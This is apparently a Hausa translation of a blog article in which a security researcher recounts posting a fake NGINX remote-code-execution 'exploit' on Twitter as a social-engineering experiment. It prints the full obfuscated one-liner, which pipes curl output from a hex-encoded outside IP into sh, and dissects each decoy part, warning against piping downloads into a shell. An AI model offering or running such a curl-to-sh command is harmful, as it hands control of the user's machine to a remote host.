ProHoster > Блог > Gudanarwa > Nasarar gwajin zamantakewa tare da amfani da nginx na karya

Nasarar gwajin zamantakewa tare da amfani da nginx na karya

Lura. fassara: marubucin bayanin kula na asali, wanda aka buga a ranar 1 ga Yuni, ya yanke shawarar yin gwaji a tsakanin masu sha'awar tsaron bayanan. Don yin wannan, ya shirya wani amfani na karya don raunin da ba a bayyana ba a cikin sabar gidan yanar gizon kuma ya buga ta a Twitter. Abubuwan da ya zato - za a fallasa su nan da nan ta hanyar kwararru waɗanda za su ga yaudarar bayyane a cikin lambar - ba wai kawai ba ta zama gaskiya ba ... Sun wuce duk tsammanin, kuma a cikin kishiyar: tweet ɗin ya sami babban tallafi daga mutane da yawa waɗanda ba su yi nasara ba. duba abinda ke ciki.

Nasarar gwajin zamantakewa tare da amfani da nginx na karya

TL; DR: Kada a yi amfani da bututun fayil a cikin sh ko bash a kowane yanayi. Wannan babbar hanya ce don rasa sarrafa kwamfutarka.

Ina so in raba tare da ku ɗan gajeren labari game da amfani mai ban dariya na PoC wanda aka ƙirƙira a ranar 31 ga Mayu. Ya bayyana nan take yana mai da martani ga labarai daga Alisa Esage Shevchenko, memba Shirye-shiryen Ranar Zero (ZDI), ba da daɗewa ba za a bayyana wannan bayanin game da rauni a cikin NGINX wanda ke haifar da RCE (kisa mai nisa). Tun da NGINX ke iko da gidajen yanar gizo da yawa, dole ne labarin ya kasance bama-bamai. Amma saboda jinkiri a cikin tsarin "bayyanannun alhaki", ba a san cikakkun bayanai game da abin da ya faru ba - wannan shine daidaitaccen tsarin ZDI.

Nasarar gwajin zamantakewa tare da amfani da nginx na karya
tweet game da bayyana rashin ƙarfi a cikin NGINX

Bayan da na gama aiki da sabuwar dabarar ɓarna a cikin curl, na nakalto ainihin tweet ɗin kuma na “leaked PoC mai aiki” wanda ya ƙunshi layi ɗaya na lamba wanda da alama yana amfani da raunin da aka gano. Tabbas wannan shirme ne. Na ɗauka cewa nan da nan za a fallasa ni, kuma da kyau zan sami wasu retweets guda biyu (oh da kyau).

Nasarar gwajin zamantakewa tare da amfani da nginx na karya
tweet tare da karya karya

Duk da haka, na kasa tunanin abin da ya faru a gaba. Shahararriyar tweet dina ya karu. Abin mamaki, a halin yanzu (15:00 Moscow lokacin Yuni 1) 'yan mutane kaɗan sun gane cewa wannan karya ne. Mutane da yawa suna retweet shi ba tare da duba shi kwata-kwata (balle ma sha'awar kyawawan zanen ASCII da yake fitarwa).

Nasarar gwajin zamantakewa tare da amfani da nginx na karya
Kawai kalli yadda yake da kyau!

Duk da yake duk waɗannan madaukai da launuka suna da kyau, a bayyane yake cewa dole ne mutane su kunna lamba akan injin su don ganin su. An yi sa'a, masu bincike suna aiki iri ɗaya, kuma tare da gaskiyar cewa ba na so in shiga cikin matsala ta doka, lambar da aka binne a cikin rukunin yanar gizona kawai tana yin kiran echo ba tare da ƙoƙarin shigar ko aiwatar da kowane ƙarin lambar ba.

Karamin digression: netspooky, watau, ni da sauran mutane daga cikin tawagar Jama'a Mun kasance muna wasa tare da hanyoyi daban-daban don toshe umarnin curl na ɗan lokaci yanzu saboda yana da kyau… kuma muna geeks ne. netspooky da dnz sun gano sabbin hanyoyi da yawa waɗanda suka yi kama da cika alkawari a gare ni. Na shiga cikin nishaɗin kuma na yi ƙoƙarin ƙara jujjuyawar ƙima ta IP zuwa jakar dabaru. Ya bayyana cewa ana iya canza IP zuwa tsarin hexadecimal. Haka kuma, curl da yawancin sauran kayan aikin NIX da farin ciki suna cin hexadecimal IPs! Don haka lamari ne kawai na ƙirƙirar layin umarni mai gamsarwa da aminci. Daga karshe na zauna akan wannan:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE) - fiye da phishing kawai

Amincewa da sanin ya kamata su kasance babban sashi na wannan gwaji. Ina ganin su ne suka kai ga nasararsa. Layin umarni a sarari yana nuna tsaro ta hanyar komawa zuwa "127.0.0.1" (sanannen localhost). Localhost ana ɗaukarsa amintacce kuma bayanan da ke cikinsa ba zai taɓa barin kwamfutarka ba.

Sanin shine maɓalli na biyu SEE bangaren gwajin. Tunda masu sauraro da aka yi niyya da farko sun ƙunshi mutanen da suka saba da tushen tsaro na kwamfuta, yana da mahimmanci a ƙirƙira lambar ta yadda sassanta suka zama sananne kuma sun saba (saboda haka lafiya). Aron abubuwa na tsoffin dabarun amfani da hada su ta wata hanya da ba a saba gani ba ya tabbatar da samun nasara sosai.

Da ke ƙasa akwai cikakken bincike na mai layi ɗaya. Duk abin da ke cikin wannan jerin yana sawa yanayin kwaskwarima, kuma a zahiri babu abin da ake buƙata don ainihin aikinsa.

Wadanne abubuwa ne da gaske suke bukata? Wannan -gsS, -O 0x0238f06a, |sh da uwar garken gidan yanar gizon kanta. Sabar gidan yanar gizon ba ta ƙunshi kowane umarni na mugunta ba, amma kawai ta yi amfani da zane-zane na ASCII ta amfani da umarni echo a cikin rubutun da ke cikin index.html. Lokacin da mai amfani ya shigar da layi tare da |sh a tsakiya, index.html lodawa da kuma kashe. Abin farin ciki, masu kula da sabar gidan yanar gizo ba su da wani mugun nufi.

  • ../../../%00 - yana wakiltar wuce kundin adireshi;
  • ngx_stream_module.so - hanyar zuwa tsarin NGINX bazuwar;
  • /bin/sh%00<'protocol:TCP' - Muna tsammanin ƙaddamarwa /bin/sh akan na'urar da aka yi niyya kuma tura fitarwa zuwa tashar TCP;
  • -O 0x0238f06a#PLToffset - sirrin sashi, kari #PLToffset, don yin kama da ƙwaƙwalwar ajiya ko ta yaya ƙunshe a cikin PLT;
  • |sh; - wani muhimmin guntu. Muna buƙatar tura fitarwa zuwa sh/bash don aiwatar da lambar da ke fitowa daga sabar gidan yanar gizon da ke kai hari 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - dummy wanda netcat ke nufi /dev/tcp/localhostdon komai ya sake zama lafiya. A gaskiya ma, ba ya yin kome kuma an haɗa shi a cikin layi don kyau.

Wannan yana ƙaddamar da ƙaddamar da rubutun layi ɗaya da tattaunawa game da bangarori na "injinin zamantakewa da lantarki" (rikitaccen phishing).

Kanfigareshan Sabar Yanar Gizo da Ma'auni

Tun da yawancin masu biyan kuɗi na infosec / hackers ne, na yanke shawarar sanya sabar gidan yanar gizon ta ɗan ƙara juriya ga maganganun "sha'awa" ta bangaren su, don kawai samari su sami wani abu da za su yi (kuma zai zama abin jin daɗi. kafa). Ba zan lissafta dukkan ramuka a nan ba tunda har yanzu gwajin na ci gaba, amma ga wasu abubuwa da uwar garken ke yi:

  • Yana sa ido sosai akan yunƙurin rarrabawa akan wasu cibiyoyin sadarwar jama'a kuma yana maye gurbin samfoti daban-daban don ƙarfafa mai amfani don danna hanyar haɗin.
  • Yana tura Chrome/Mozilla/Safari/da ​​sauransu zuwa bidiyon talla na Thugcrowd maimakon nuna rubutun harsashi.
  • Kallon ga BABBAN alamun kutsawa/Hacking, sannan ya fara tura buƙatun zuwa sabar NSA (ha!).
  • Yana shigar da Trojan, da kuma tushen tushen BIOS, akan duk kwamfutoci waɗanda masu amfani da su ke ziyartar mai watsa shiri daga mai bincike na yau da kullun (kawai wasa!).

Nasarar gwajin zamantakewa tare da amfani da nginx na karya
Ƙananan ɓangaren antimers

A wannan yanayin, kawai burina shine in mallaki wasu fasalulluka na Apache - musamman, ƙa'idodi masu kyau don tura buƙatun - kuma na yi tunani: me yasa?

NGINX Exploit (Gaskiya!)

Biyan kuɗi zuwa @alisaesage akan Twitter kuma ku bi babban aikin ZDI don magance rashin ƙarfi na gaske da amfani da damar a cikin NGINX. Ayyukansu koyaushe suna burge ni kuma ina godiya ga Alice saboda haƙurin da ta yi da duk ambato da sanarwar da na yi ta tweet ɗin wauta. Abin farin ciki, shi ma ya yi wasu kyau: ya taimaka wajen wayar da kan jama'a game da raunin NGINX, da kuma matsalolin da ke haifar da cin zarafi na curl.

source: www.habr.com

Add a comment